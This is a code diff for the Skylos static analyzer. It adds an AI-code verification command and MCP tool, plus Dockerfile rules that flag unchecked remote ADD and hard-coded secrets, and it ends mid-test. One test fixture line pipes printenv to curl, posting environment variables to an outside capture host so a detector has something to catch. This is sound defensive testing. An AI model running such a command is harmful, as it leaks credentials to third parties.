+def _finding_range(finding: dict[str, Any], root: Path) -> dict[str, Any]:
+    line_value = _finding_value(finding, ("line", "line_number"), None)
+    line = _positive_int(line_value, default=1)
+    col_value = _finding_value(finding, ("col", "column"), None)
+    col = _non_negative_int(col_value, default=0)
+    end_line_value = _finding_value(finding, ("end_line", "endLine"), None)
+    end_line = _positive_int(end_line_value, default=line)
+    end_col_value = _finding_value(finding, ("end_col", "endCol"), None)
+    file_value = _finding_value(finding, ("file", "file_path"), None)
+
+    return {
+        "file": _relative_file(file_value, root),
+        "start_line": line,
+        "start_col": col,
+        "end_line": max(line, end_line),
+        "end_col": _non_negative_int(end_col_value, default=col),
+    }
+
+
+def _matches_target(
+    finding: dict[str, Any],
+    root: Path,
+    target_file: str | Path | None,
+) -> bool:
+    if target_file is None:
+        return True
+
+    finding_file = _finding_value(finding, ("file", "file_path"), None)
+    if not finding_file:
+        return False
+
+    finding_keys = _file_keys(finding_file, root)
+    target_keys = _file_keys(target_file, root)
+    return finding_keys & target_keys != set()
+
+
+def _matches_line_range(
+    finding: dict[str, Any],
+    line_range: tuple[int, int] | None,
+) -> bool:
+    if line_range is None:
+        return True
+
+    start, end = line_range
+    line_value = _finding_value(finding, ("line", "line_number"), None)
+    line = _positive_int(line_value, default=1)
+    end_line_value = _finding_value(finding, ("end_line", "endLine"), None)
+    finding_end = _positive_int(end_line_value, default=line)
+    return not (finding_end < start or line > end)
+
+
+def _file_keys(path: str | Path, root: Path) -> set[str]:
+    raw = Path(path)
+    keys = {str(raw).replace("\\", "/")}
+    try:
+        if raw.is_absolute():
+            resolved = raw
+        else:
+            resolved = root / raw
+
+        absolute = resolved.resolve()
+        keys.add(str(absolute).replace("\\", "/"))
+        keys.add(str(absolute.relative_to(root)).replace("\\", "/"))
+    except (OSError, ValueError):
+        pass
+    return keys
+
+
+def _relative_file(path: Any, root: Path) -> str:
+    if not path:
+        return "unknown"
+
+    raw = Path(str(path))
+    try:
+        if raw.is_absolute():
+            resolved = raw
+        else:
+            resolved = root / raw
+
+        relative = resolved.resolve().relative_to(root)
+        return str(relative).replace("\\", "/")
+    except (OSError, ValueError):
+        return str(raw).replace("\\", "/")
+
+
+def _project_root(path: str | Path) -> Path:
+    candidate = Path(path).expanduser()
+    if candidate.is_file():
+        candidate = candidate.parent
+    try:
+        return candidate.resolve()
+    except OSError:
+        return candidate
+
+
+def _coerce_line_range(
+    value: str | tuple[int, int] | None,
+) -> tuple[int, int] | None:
+    if isinstance(value, tuple):
+        start, end = value
+        _validate_line_range(start, end)
+        return start, end
+    return parse_line_range(value)
+
+
+def _target_file_for_payload(target_file: str | Path | None, root: Path) -> str | None:
+    if target_file is None:
+        return None
+    return _relative_file(target_file, root)
+
+
+def _range_for_payload(line_range: tuple[int, int] | None) -> dict[str, int] | None:
+    if line_range is None:
+        return None
+    start, end = line_range
+    return {"start_line": start, "end_line": end}
+
+
+def _summary(findings: list[dict[str, Any]]) -> str:
+    count = len(findings)
+    if count == 0:
+        return "No AI-code issues found"
+    if count == 1:
+        issue_word = "issue"
+    else:
+        issue_word = "issues"
+    return f"{count} AI-code {issue_word} found"
+
+
+def _message(finding: dict[str, Any]) -> str:
+    message = _finding_value(finding, ("message", "detail", "msg"), None)
+    if message:
+        return str(message)
+
+    rule_id = _finding_value(finding, ("rule_id",), "UNKNOWN")
+    return f"{rule_id} finding"
+
+
+def _suggested_fix(finding: dict[str, Any], vibe_category: str) -> str | None:
+    fix = _finding_value(
+        finding,
+        ("suggested_fix", "fix", "recommendation"),
+        None,
+    )
+    if fix:
+        return str(fix)
+    return SUGGESTED_FIX_BY_VIBE.get(vibe_category)
+
+
+def _confidence(value: Any, ai_likelihood: str) -> int:
+    coerced = _optional_int(value)
+    if coerced is not None:
+        return min(100, max(0, coerced))
+
+    likelihood_scores = {"high": 90, "medium": 70, "low": 50}
+    return likelihood_scores.get(ai_likelihood.lower(), 70)
+
+
+def _likelihood_sort(value: str) -> int:
+    likelihood_order = {"high": 0, "medium": 1, "low": 2}
+    return likelihood_order.get(str(value).lower(), 3)
+
+
+def _optional_int(value: Any) -> int | None:
+    try:
+        return int(value)
+    except (TypeError, ValueError):
+        return None
+
+
+def _positive_int(value: Any, *, default: int) -> int:
+    parsed = _optional_int(value)
+    if parsed is None:
+        return default
+    if parsed <= 0:
+        return default
+    return parsed
+
+
+def _non_negative_int(value: Any, *, default: int) -> int:
+    parsed = _optional_int(value)
+    if parsed is None:
+        return default
+    if parsed < 0:
+        return default
+    return parsed
+
+
+def _line_range_separator(raw: str) -> str | None:
+    if ":" in raw:
+        return ":"
+    if "-" in raw:
+        return "-"
+    return None
+
+
+def _validate_line_range(start: int, end: int) -> None:
+    if start <= 0:
+        raise ValueError("line range values must be positive")
+    if end <= 0:
+        raise ValueError("line range values must be positive")
+    if end < start:
+        raise ValueError("line range end must be greater than or equal to start")
+
+
+def _status_for_findings(findings: list[dict[str, Any]]) -> str:
+    if findings:
+        return "fail"
+    return "pass"
+
+
+def _target_path_for_payload(
+    scan_target: str | Path | None,
+    target_file: str | Path | None,
+    project_root: str | Path,
+) -> str:
+    for value in (scan_target, target_file, project_root):
+        if value is not None:
+            return str(value)
+    return "."
+
+
+def _finding_value(
+    finding: dict[str, Any],
+    keys: tuple[str, ...],
+    default: Any,
+) -> Any:
+    for key in keys:
+        value = finding.get(key)
+        if _has_value(value):
+            return value
+    return default
+
+
+def _has_value(value: Any) -> bool:
+    if value is None:
+        return False
+    if isinstance(value, str):
+        if value.strip() == "":
+            return False
+    return True
+
+
+def _section_findings(
+    analysis_result: dict[str, Any],
+    section: str,
+) -> list[dict[str, Any]]:
+    findings = analysis_result.get(section)
+    if isinstance(findings, list):
+        return findings
+    return []
+
+
+def _rule_defaults(rule_id: str) -> tuple[str, str]:
+    defaults = AI_RULE_DEFAULTS.get(rule_id)
+    if defaults is not None:
+        return defaults
+    return "", "medium"

--- a/skylos/rules/catalog.py
+++ b/skylos/rules/catalog.py
@@ -204,6 +204,8 @@ _RULES = (
     RuleCatalogEntry("SKY-D339", "Persistent environment mutation", "security", "HIGH"),
     RuleCatalogEntry("SKY-D340", "Unapproved package or artifact publish", "security", "HIGH"),
     RuleCatalogEntry("SKY-D341", "Untrusted package-managed tool execution", "security", "HIGH"),
+    RuleCatalogEntry("SKY-D342", "Dockerfile remote ADD without checksum", "security", "HIGH"),
+    RuleCatalogEntry("SKY-D343", "Dockerfile literal secret build value", "security", "HIGH"),
     RuleCatalogEntry("SKY-G203", "Go defer in loop", "security", "HIGH"),
     RuleCatalogEntry("SKY-G206", "Go unsafe package import", "security", "HIGH"),
     RuleCatalogEntry("SKY-G207", "Go weak MD5 hash", "security", "MEDIUM"),

--- a/skylos/rules/config/container/dockerfile.py
+++ b/skylos/rules/config/container/dockerfile.py
@@ -27,13 +27,23 @@ SKIP_DIR_NAMES = {
     "venv",
 }
 MAX_DOCKERFILE_BYTES = 1_000_000
-RUN_RE = re.compile(r"^\s*RUN(?:\s|$)", re.I)
+INSTRUCTION_RE = re.compile(r"^\s*(?P<instruction>[A-Z]+)(?:\s|$)", re.I)
 RUN_OPTION_RE = re.compile(
     r"^--(?:mount|network|security)"
     r"(?:=(?:\"[^\"]*\"|'[^']*'|[^\s]+)|\s+(?:\"[^\"]*\"|'[^']*'|[^\s]+))"
     r"\s*"
 )
 SHELL_INTERPRETERS = {"bash", "dash", "ksh", "sh", "zsh"}
+ADD_VALUE_FLAGS = {"--checksum", "--chown", "--chmod", "--exclude", "--keep-git-dir"}
+SECRET_REFERENCE_SUFFIXES = ("_FILE", "_PATH", "_DIR", "_NAME", "_ARN")
+REMOTE_URL_RE = re.compile(r"^https?://", re.I)
+SECRET_NAME_RE = re.compile(
+    r"(?:^|_)(?:"
+    r"API_KEY|ACCESS_KEY|CLIENT_SECRET|CREDENTIALS?|PASSWORD|PASSWD|"
+    r"PRIVATE_KEY|SECRET|TOKEN"
+    r")(?:_|$)",
+    re.I,
+)
 
 
 def _finding(
@@ -111,22 +121,24 @@ def _discover_dockerfiles(root: Path, changed_files: set[str] | None) -> list[Pa
     return sorted(candidates)
 
 
-def _iter_run_instructions(lines: list[str]) -> Iterator[tuple[int, str]]:
+def _iter_instructions(lines: list[str]) -> Iterator[tuple[int, str, str]]:
     idx = 0
     while idx < len(lines):
         line = lines[idx]
-        if not RUN_RE.match(line):
+        match = INSTRUCTION_RE.match(line)
+        if not match:
             idx += 1
             continue
 
+        instruction = match.group("instruction").upper()
         start_line = idx + 1
-        body = RUN_RE.sub("", line, count=1).strip()
+        body = line[match.end() :].strip()
         while _line_continues(lines[idx]) and idx + 1 < len(lines):
             body = body.rstrip().removesuffix("\\").rstrip()
             idx += 1
             body = f"{body} {lines[idx].strip()}".strip()
 
-        yield start_line, body
+        yield start_line, instruction, body
         idx += 1
 
 
@@ -146,6 +158,172 @@ def _commands_from_run_body(body: str) -> Iterator[str]:
         return
 
     yield stripped
+
+
+def _add_sources_from_body(body: str) -> tuple[list[str], bool]:
+    tokens = _instruction_tokens(body)
+    if not tokens:
+        return [], False
+
+    sources: list[str] = []
+    has_checksum = False
+    idx = 0
+    while idx < len(tokens):
+        token = tokens[idx]
+        if token == "--checksum":
+            has_checksum = True
+            idx += 2
+            continue
+        if token.startswith("--checksum="):
+            has_checksum = True
+            idx += 1
+            continue
+        if token.startswith("--"):
+            flag_name = token.split("=", 1)[0]
+            if "=" in token or flag_name not in ADD_VALUE_FLAGS:
+                idx += 1
+            else:
+                idx += 2
+            continue
+        sources.append(token)
+        idx += 1
+
+    if len(sources) <= 1:
+        return [], has_checksum
+    return sources[:-1], has_checksum
+
+
+def _instruction_tokens(body: str) -> list[str]:
+    stripped = body.strip()
+    if not stripped:
+        return []
+    if stripped.startswith("["):
+        try:
+            raw = json.loads(stripped)
+        except json.JSONDecodeError:
+            return []
+        if isinstance(raw, list) and all(isinstance(item, str) for item in raw):
+            return raw
+        return []
+    return _shell_tokens(stripped)
+
+
+def _secret_assignments_from_body(instruction: str, body: str) -> list[tuple[str, str]]:
+    tokens = _instruction_tokens(body)
+    if not tokens:
+        return []
+
+    assignments: list[tuple[str, str]] = []
+    if instruction == "ARG":
+        for token in tokens:
+            if "=" not in token:
+                continue
+            name, value = token.split("=", 1)
+            assignments.append((name, value))
+        return assignments
+
+    if instruction != "ENV":
+        return []
+
+    equals_tokens = [
+        token for token in tokens if "=" in token and not token.startswith("=")
+    ]
+    if equals_tokens:
+        for token in equals_tokens:
+            name, value = token.split("=", 1)
+            assignments.append((name, value))
+        return assignments
+
+    if len(tokens) >= 2:
+        assignments.append((tokens[0], " ".join(tokens[1:])))
+    return assignments
+
+
+def _secret_value_is_literal(value: str) -> bool:
+    raw = value.strip()
+    if not raw:
+        return False
+    if raw.startswith("$"):
+        return False
+    return True
+
+
+def _secret_name_is_sensitive(name: str) -> bool:
+    normalized = name.strip()
+    if not normalized:
+        return False
+    if normalized.upper().endswith(SECRET_REFERENCE_SUFFIXES):
+        return False
+    return SECRET_NAME_RE.search(normalized) is not None
+
+
+def _scan_remote_add(
+    findings: list[dict[str, Any]],
+    *,
+    file_path: Path,
+    lines: list[str],
+    line: int,
+    body: str,
+    ignore: set[str],
+) -> None:
+    rule_id = "SKY-D342"
+    if rule_id in ignore or _is_inline_ignored(lines, line, rule_id):
+        return
+    sources, has_checksum = _add_sources_from_body(body)
+    if has_checksum:
+        return
+    if not any(REMOTE_URL_RE.match(source) for source in sources):
+        return
+    findings.append(
+        _finding(
+            rule_id=rule_id,
+            name="dockerfile-remote-add-without-checksum",
+            message=(
+                "Dockerfile ADD fetches a remote URL without a checksum. "
+                "Download with a pinned digest/checksum or vendor the artifact."
+            ),
+            file=file_path,
+            line=line,
+            severity="HIGH",
+            value="ADD remote URL",
+        )
+    )
+
+
+def _scan_secret_build_values(
+    findings: list[dict[str, Any]],
+    *,
+    file_path: Path,
+    lines: list[str],
+    line: int,
+    instruction: str,
+    body: str,
+    ignore: set[str],
+) -> None:
+    rule_id = "SKY-D343"
+    if rule_id in ignore or _is_inline_ignored(lines, line, rule_id):
+        return
+    for name, value in _secret_assignments_from_body(instruction, body):
+        if not _secret_name_is_sensitive(name):
+            continue
+        if not _secret_value_is_literal(value):
+            continue
+        findings.append(
+            _finding(
+                rule_id=rule_id,
+                name="dockerfile-literal-secret-build-value",
+                message=(
+                    f"Dockerfile {instruction} sets secret-looking `{name}` to a "
+                    "literal value. Use build secrets or runtime secret injection "
+                    "instead of baking credentials into image layers."
+                ),
+                file=file_path,
+                line=line,
+                severity="HIGH",
+                value=f"{instruction} {name}",
+            )
+        )
+        return
 
 
 def _strip_run_options(body: str) -> str:
@@ -206,22 +384,44 @@ def scan_dockerfile_file(
     ignored = ignore or set()
     lines = text.splitlines()
     findings: list[dict[str, Any]] = []
-    for line, body in _iter_run_instructions(lines):
-        for command in _commands_from_run_body(body):
-            for risk in scan_shell_command(command):
-                if risk.rule_id in ignored or _is_inline_ignored(lines, line, risk.rule_id):
-                    continue
-                findings.append(
-                    _finding(
-                        rule_id=risk.rule_id,
-                        name="dockerfile-run-command-risk",
-                        message=risk.message,
-                        file=file_path,
-                        line=line,
-                        severity=risk.severity,
-                        value=risk.rule_id,
+    for line, instruction, body in _iter_instructions(lines):
+        if instruction == "RUN":
+            for command in _commands_from_run_body(body):
+                for risk in scan_shell_command(command):
+                    if risk.rule_id in ignored or _is_inline_ignored(
+                        lines, line, risk.rule_id
+                    ):
+                        continue
+                    findings.append(
+                        _finding(
+                            rule_id=risk.rule_id,
+                            name="dockerfile-run-command-risk",
+                            message=risk.message,
+                            file=file_path,
+                            line=line,
+                            severity=risk.severity,
+                            value=risk.rule_id,
+                        )
                     )
-                )
+        elif instruction == "ADD":
+            _scan_remote_add(
+                findings,
+                file_path=file_path,
+                lines=lines,
+                line=line,
+                body=body,
+                ignore=ignored,
+            )
+        elif instruction in {"ARG", "ENV"}:
+            _scan_secret_build_values(
+                findings,
+                file_path=file_path,
+                lines=lines,
+                line=line,
+                instruction=instruction,
+                body=body,
+                ignore=ignored,
+            )
     return findings
 
 

--- a/skylos/ui/help.py
+++ b/skylos/ui/help.py
@@ -151,7 +151,7 @@ COMMANDS = [
     },
     {
         "name": "skylos run",
-        "desc": "Start local web dashboard server (--port and SKYLOS_PORT supported)",
+        "desc": "Deprecated local web dashboard; use skylos . -a or skylos suite .",
         "group": "Utility",
     },
     {"name": "skylos commands", "desc": "List all commands (flat)", "group": "Utility"},

--- a/skylos/ui/help.py
+++ b/skylos/ui/help.py
@@ -12,6 +12,11 @@ COMMANDS = [
         "group": "Core Analysis",
     },
     {
+        "name": "skylos verify <path>",
+        "desc": "Verify changed code for AI-code defects",
+        "group": "AI Agent",
+    },
+    {
         "name": "skylos discover <path>",
         "desc": "Map LLM/AI integrations in your codebase",
         "group": "Core Analysis",

--- a/skylos/verify_change.py
+++ b/skylos/verify_change.py
@@ -1,0 +1,248 @@
+from __future__ import annotations
+
+import json
+import os
+import tempfile
+from pathlib import Path
+from typing import Any
+
+from skylos.core.verify_change_schema import (
+    build_verify_change_response,
+    parse_line_range,
+)
+
+__all__ = [
+    "build_verify_change_response",
+    "parse_line_range",
+    "verify_change_path",
+    "verify_change_stdin_payload",
+]
+
+
+def verify_change_path(
+    path: str | Path,
+    *,
+    file: str | Path | None = None,
+    line_range: str | tuple[int, int] | None = None,
+    confidence: int = 60,
+    exclude_folders: list[str] | None = None,
+    project_context: bool = False,
+    include_dependency_hallucinations: bool = False,
+    analyze_func=None,
+) -> dict[str, Any]:
+    target = Path(path).expanduser()
+    target_file = _optional_path(file)
+    scan_target = _scan_target(target, target_file, project_context=project_context)
+    root = _root_for_verify_target(target)
+
+    if analyze_func is None:
+        from skylos.analyzer import analyze as analyze_func
+
+    analysis_options = _analysis_options(
+        confidence=confidence,
+        exclude_folders=exclude_folders,
+        include_dependency_hallucinations=include_dependency_hallucinations,
+    )
+    raw_result = analyze_func(str(scan_target), **analysis_options)
+    analysis_result = _analysis_result_dict(raw_result)
+
+    return build_verify_change_response(
+        analysis_result,
+        project_root=root,
+        target_file=target_file,
+        line_range=line_range,
+        scan_target=scan_target,
+    )
+
+
+def verify_change_stdin_payload(
+    payload: dict[str, Any],
+    *,
+    confidence: int = 60,
+    exclude_folders: list[str] | None = None,
+    analyze_func=None,
+) -> dict[str, Any]:
+    if not isinstance(payload, dict):
+        raise ValueError("stdin manifest must be a JSON object")
+
+    code = payload.get("code")
+    if not isinstance(code, str):
+        raise ValueError("stdin manifest must include a string 'code' field")
+
+    manifest_file = _safe_manifest_file(_manifest_value(payload, ("file",), "snippet.py"))
+    line_range = _manifest_value(payload, ("line_range", "range"), None)
+    include_deps = bool(payload.get("include_dependency_hallucinations", False))
+
+    with tempfile.TemporaryDirectory(prefix="skylos-verify-") as tmp:
+        tmp_root = Path(tmp)
+        temp_file = _write_manifest_code(tmp_root, manifest_file, code)
+
+        result = verify_change_path(
+            temp_file,
+            line_range=line_range,
+            confidence=confidence,
+            exclude_folders=exclude_folders,
+            include_dependency_hallucinations=include_deps,
+            analyze_func=analyze_func,
+        )
+
+    result["target"]["path"] = _manifest_target_path(payload)
+    result["target"]["file"] = _manifest_file_for_output(manifest_file)
+    for finding in _result_findings(result):
+        finding["range"]["file"] = _manifest_file_for_output(manifest_file)
+    return result
+
+
+def _analysis_options(
+    *,
+    confidence: int,
+    exclude_folders: list[str] | None,
+    include_dependency_hallucinations: bool,
+) -> dict[str, Any]:
+    return {
+        "conf": confidence,
+        "exclude_folders": exclude_folders,
+        "enable_quality": True,
+        "enable_danger": include_dependency_hallucinations,
+        "enable_secrets": False,
+        "grep_verify": False,
+        "trace_file": False,
+    }
+
+
+def _write_manifest_code(root: Path, manifest_file: Path, code: str) -> Path:
+    root_resolved = root.resolve()
+    temp_file = _contained_manifest_path(root_resolved, manifest_file)
+    temp_file.parent.mkdir(parents=True, exist_ok=True)
+    _write_new_file_no_follow(temp_file, code)
+    return temp_file
+
+
+def _contained_manifest_path(root: Path, manifest_file: Path) -> Path:
+    candidate = (root / manifest_file).resolve()
+    try:
+        candidate.relative_to(root)
+    except ValueError as exc:
+        raise ValueError("stdin manifest file must stay inside the temp root") from exc
+    return candidate
+
+
+def _write_new_file_no_follow(path: Path, code: str) -> None:
+    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL
+    if hasattr(os, "O_NOFOLLOW"):
+        flags |= os.O_NOFOLLOW
+
+    fd: int | None = None
+    try:
+        fd = os.open(path, flags, 0o600)  # skylos: ignore[SKY-D215] contained temp manifest path with no-follow create
+        with os.fdopen(fd, "w", encoding="utf-8") as handle:
+            fd = None
+            handle.write(code)
+    finally:
+        if fd is not None:
+            try:
+                os.close(fd)
+            except OSError:
+                pass
+
+
+def _scan_target(
+    path: Path,
+    target_file: Path | None,
+    *,
+    project_context: bool,
+) -> Path:
+    if target_file is None:
+        return path
+    if project_context:
+        if path.is_dir():
+            return path
+    if target_file.is_absolute():
+        return target_file
+    if path.is_dir():
+        return path / target_file
+    return target_file
+
+
+def _safe_manifest_file(value: Any) -> Path:
+    raw = str(value).strip()
+    if not raw:
+        raw = "snippet.py"
+
+    path = Path(raw)
+    if path.is_absolute():
+        raise ValueError("stdin manifest file must be relative")
+    for part in path.parts:
+        if part in {"", ".", ".."}:
+            raise ValueError("stdin manifest file must not contain traversal segments")
+    return path
+
+
+def _optional_path(value: str | Path | None) -> Path | None:
+    if value is None:
+        return None
+    return Path(value).expanduser()
+
+
+def _root_for_verify_target(target: Path) -> Path:
+    if target.is_dir():
+        return _project_root(target)
+    return _project_root(target.parent)
+
+
+def _project_root(path: str | Path) -> Path:
+    candidate = Path(path).expanduser()
+    if candidate.is_file():
+        candidate = candidate.parent
+    try:
+        return candidate.resolve()
+    except OSError:
+        return candidate
+
+
+def _analysis_result_dict(raw_result: Any) -> dict[str, Any]:
+    if isinstance(raw_result, str):
+        parsed = json.loads(raw_result)
+    else:
+        parsed = raw_result
+
+    if isinstance(parsed, dict):
+        return parsed
+    return {}
+
+
+def _manifest_value(
+    payload: dict[str, Any],
+    keys: tuple[str, ...],
+    default: Any,
+) -> Any:
+    for key in keys:
+        value = payload.get(key)
+        if _has_manifest_value(value):
+            return value
+    return default
+
+
+def _has_manifest_value(value: Any) -> bool:
+    if value is None:
+        return False
+    if isinstance(value, str):
+        if value.strip() == "":
+            return False
+    return True
+
+
+def _manifest_target_path(payload: dict[str, Any]) -> str:
+    value = _manifest_value(payload, ("path",), ".")
+    return str(value)
+
+
+def _manifest_file_for_output(manifest_file: Path) -> str:
+    return str(manifest_file).replace("\\", "/")
+
+
+def _result_findings(result: dict[str, Any]) -> list[dict[str, Any]]:
+    findings = result.get("findings")
+    if isinstance(findings, list):
+        return findings
+    return []

--- a/skylos/visitors/base.py
+++ b/skylos/visitors/base.py
@@ -64,6 +64,7 @@ PYTHON_BUILTINS = {
 }
 
 DYNAMIC_PATTERNS = {"getattr", "globals", "eval", "exec"}
+IMPORT_FALLBACK_EXCEPTIONS = {"ImportError", "ModuleNotFoundError"}
 
 OVERRIDE_DECORATORS = {
     "override",
@@ -177,6 +178,21 @@ IMPLICIT_DUNDERS = {
 }
 
 METACLASS_BASES = {"ABCMeta", "EnumMeta", "type"}
+
+
+def _exception_type_leaf_names(exc_type: ast.expr | None) -> set[str]:
+    if exc_type is None:
+        return set()
+    if isinstance(exc_type, ast.Name):
+        return {exc_type.id}
+    if isinstance(exc_type, ast.Attribute):
+        return {exc_type.attr}
+    if isinstance(exc_type, (ast.Tuple, ast.List)):
+        names: set[str] = set()
+        for elt in exc_type.elts:
+            names.update(_exception_type_leaf_names(elt))
+        return names
+    return set()
 
 
 class Definition:
@@ -601,8 +617,7 @@ class Visitor(ast.NodeVisitor):
         self._complexity_stack[-1] += len(node.handlers)
 
         is_import_error_handler = any(
-            isinstance(h.type, ast.Name)
-            and h.type.id in ("ImportError", "ModuleNotFoundError")
+            _exception_type_leaf_names(h.type) & IMPORT_FALLBACK_EXCEPTIONS
             for h in node.handlers
         )
 
@@ -639,6 +654,9 @@ class Visitor(ast.NodeVisitor):
                             self.add_ref(full_name)
 
         self.generic_visit(node)
+
+    if hasattr(ast, "TryStar"):
+        visit_TryStar = visit_Try
 
     def visit_With(self, node: ast.With) -> None:
         for item in node.items:

--- a/skylos_mcp/server.py
+++ b/skylos_mcp/server.py
@@ -320,6 +320,37 @@ def _validate_code_change_impl(
     }
 
 
+def _verify_change_impl(
+    path: str = ".",
+    file: str | None = None,
+    line_range: str | None = None,
+    confidence: int = 60,
+    project_context: bool = False,
+    include_dependency_hallucinations: bool = False,
+    exclude_folders: str | None = None,
+) -> dict:
+    """Core logic for verify_change, extracted for testability."""
+    from skylos.verify_change import verify_change_path
+
+    parse_exclude_folders, _ = _lazy_constants()
+    excl = list(parse_exclude_folders(use_defaults=True))
+    if exclude_folders:
+        for folder in exclude_folders.split(","):
+            folder = folder.strip()
+            if folder:
+                excl.append(folder)
+
+    return verify_change_path(
+        path,
+        file=file,
+        line_range=line_range,
+        confidence=confidence,
+        exclude_folders=excl,
+        project_context=project_context,
+        include_dependency_hallucinations=include_dependency_hallucinations,
+    )
+
+
 def _resolve_analysis_target(path: str) -> Path:
     return Path(path).expanduser().resolve()
 
@@ -1060,6 +1091,42 @@ def _register_tools(mcp):
         try:
             result = _validate_code_change_impl(diff, path, policy)
             _store_result(result, "validate_code_change", path)
+            return json.dumps(result, indent=2)
+        except Exception as e:
+            return json.dumps({"error": str(e)})
+
+    @mcp.tool()
+    def verify_change(
+        path: str = ".",
+        file: str | None = None,
+        line_range: str | None = None,
+        confidence: int = 60,
+        project_context: bool = False,
+        include_dependency_hallucinations: bool = False,
+        exclude_folders: str | None = None,
+    ) -> str:
+        """Verify a changed file/range for AI-code defects.
+
+        Returns a narrow, versioned JSON verdict containing only AI-code trust
+        findings such as hallucinated references, unfinished generated code,
+        stale references, disabled controls, and optional dependency
+        hallucinations.
+        """
+        gate_err = _gate("verify_change")
+        if gate_err:
+            return gate_err
+
+        try:
+            result = _verify_change_impl(
+                path=path,
+                file=file,
+                line_range=line_range,
+                confidence=confidence,
+                project_context=project_context,
+                include_dependency_hallucinations=include_dependency_hallucinations,
+                exclude_folders=exclude_folders,
+            )
+            _store_result(result, "verify_change", path)
             return json.dumps(result, indent=2)
         except Exception as e:
             return json.dumps({"error": str(e)})

--- a/test/test_cli_refactor_guardrails.py
+++ b/test/test_cli_refactor_guardrails.py
@@ -371,6 +371,23 @@ def test_cli_guardrail_discover_dispatch_preserves_argv(monkeypatch):
     mock_discover.assert_called_once_with(["repo", "--json", "--exclude", "venv"])
 
 
+def test_cli_guardrail_verify_dispatch_preserves_argv(monkeypatch):
+    monkeypatch.setattr(
+        sys,
+        "argv",
+        ["skylos", "verify", "repo", "--file", "app.py", "--range", "2:5"],
+    )
+
+    with (
+        patch("skylos.commands.verify_cmd.run_verify_command", return_value=0) as mock_verify,
+        pytest.raises(SystemExit) as exc,
+    ):
+        cli.main()
+
+    assert exc.value.code == 0
+    mock_verify.assert_called_once_with(["repo", "--file", "app.py", "--range", "2:5"])
+
+
 def test_cli_guardrail_defend_dispatch_preserves_argv(monkeypatch):
     monkeypatch.setattr(
         sys,

--- a/test/test_cli_run.py
+++ b/test/test_cli_run.py
@@ -4,6 +4,7 @@ import types
 from unittest.mock import patch
 
 import pytest
+from rich.console import Console
 
 
 class TestRunCommand:
@@ -52,3 +53,27 @@ class TestRunCommand:
                 main()
 
         assert exc_info.value.code == 1
+
+    def test_run_command_warns_that_web_dashboard_is_deprecated(self):
+        from skylos.commands.run_cmd import run_run_command
+
+        seen = {}
+        console = Console(record=True, width=200)
+
+        def capture_start_server(**kwargs):
+            seen["kwargs"] = kwargs
+
+        run_run_command(
+            [],
+            console_factory=lambda: console,
+            load_config_func=lambda _path: {},
+            parse_exclude_folders_func=lambda **_kwargs: ("custom_folder",),
+            start_server_loader=lambda: capture_start_server,
+        )
+
+        rendered = console.export_text()
+        assert "`skylos run` is deprecated" in rendered
+        assert "next major release" in rendered
+        assert "skylos . -a" in rendered
+        assert "skylos suite ." in rendered
+        assert seen["kwargs"] == {"exclude_folders": ["custom_folder"]}

--- a/test/test_dead_code_liveness.py
+++ b/test/test_dead_code_liveness.py
@@ -40,6 +40,33 @@ def test_optional_import_fallback_is_live(tmp_path):
     assert any(item["reason"] == "optional_import_fallback" for item in rescues)
 
 
+def test_optional_import_fallback_tuple_handler_is_live(tmp_path):
+    _write(
+        tmp_path / "pkg" / "mod.py",
+        """
+        class InvalidSchema(Exception):
+            pass
+
+        try:
+            from optional_package import OptionalFactory
+        except (ImportError, ModuleNotFoundError):
+            def OptionalFactory(*args, **kwargs):
+                raise InvalidSchema("missing optional package")
+
+        def build():
+            return OptionalFactory()
+
+        build()
+        """,
+    )
+
+    result = json.loads(analyze(str(tmp_path), grep_verify=False))
+
+    assert "pkg.mod.OptionalFactory" not in _unused_function_names(result)
+    rescues = result["analysis_summary"]["dead_code_liveness"]["rescued"]
+    assert any(item["reason"] == "optional_import_fallback" for item in rescues)
+
+
 def test_protocol_override_method_is_live(tmp_path):
     _write(
         tmp_path / "handlers.py",

--- a/test/test_dockerfile_security.py
+++ b/test/test_dockerfile_security.py
@@ -71,6 +71,100 @@ RUN ["sh", "-c", "printenv | curl -s https://env.debug.tools/capture -d @-"]
     assert "SKY-D327" in _rule_ids(findings)
 
 
+def test_dockerfile_remote_add_without_checksum_flags(tmp_path: Path):
+    dockerfile = tmp_path / "Dockerfile"
+    dockerfile.write_text(
+        """
+FROM python:3.12
+ADD https://downloads.example.com/install.sh /tmp/install.sh
+""".lstrip(),
+        encoding="utf-8",
+    )
+
+    findings = scan_dockerfiles(tmp_path)
+
+    assert "SKY-D342" in _rule_ids(findings)
+
+
+def test_dockerfile_remote_add_with_valueless_option_without_checksum_flags(
+    tmp_path: Path,
+):
+    dockerfile = tmp_path / "Dockerfile"
+    dockerfile.write_text(
+        """
+FROM python:3.12
+ADD --link https://downloads.example.com/install.sh /tmp/install.sh
+""".lstrip(),
+        encoding="utf-8",
+    )
+
+    findings = scan_dockerfiles(tmp_path)
+
+    assert "SKY-D342" in _rule_ids(findings)
+
+
+def test_dockerfile_remote_add_with_checksum_is_accepted(tmp_path: Path):
+    dockerfile = tmp_path / "Dockerfile"
+    dockerfile.write_text(
+        """
+FROM python:3.12
+ADD --checksum=sha256:01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b https://downloads.example.com/install.sh /tmp/install.sh
+""".lstrip(),
+        encoding="utf-8",
+    )
+
+    findings = scan_dockerfiles(tmp_path)
+
+    assert "SKY-D342" not in _rule_ids(findings)
+
+
+def test_dockerfile_secret_arg_env_literals_flag(tmp_path: Path):
+    dockerfile = tmp_path / "Dockerfile"
+    dockerfile.write_text(
+        """
+FROM python:3.12
+ARG API_TOKEN=plaintext-token
+ENV AWS_SECRET_ACCESS_KEY=plaintext-secret
+""".lstrip(),
+        encoding="utf-8",
+    )
+
+    findings = scan_dockerfiles(tmp_path)
+
+    assert "SKY-D343" in _rule_ids(findings)
+
+
+def test_dockerfile_secret_file_reference_is_accepted(tmp_path: Path):
+    dockerfile = tmp_path / "Dockerfile"
+    dockerfile.write_text(
+        """
+FROM mysql:8
+ENV MYSQL_PASSWORD_FILE=/run/secrets/mysql_password
+""".lstrip(),
+        encoding="utf-8",
+    )
+
+    findings = scan_dockerfiles(tmp_path)
+
+    assert "SKY-D343" not in _rule_ids(findings)
+
+
+def test_dockerfile_secret_arg_without_default_is_accepted(tmp_path: Path):
+    dockerfile = tmp_path / "Dockerfile"
+    dockerfile.write_text(
+        """
+FROM python:3.12
+ARG API_TOKEN
+ENV NODE_ENV=production
+""".lstrip(),
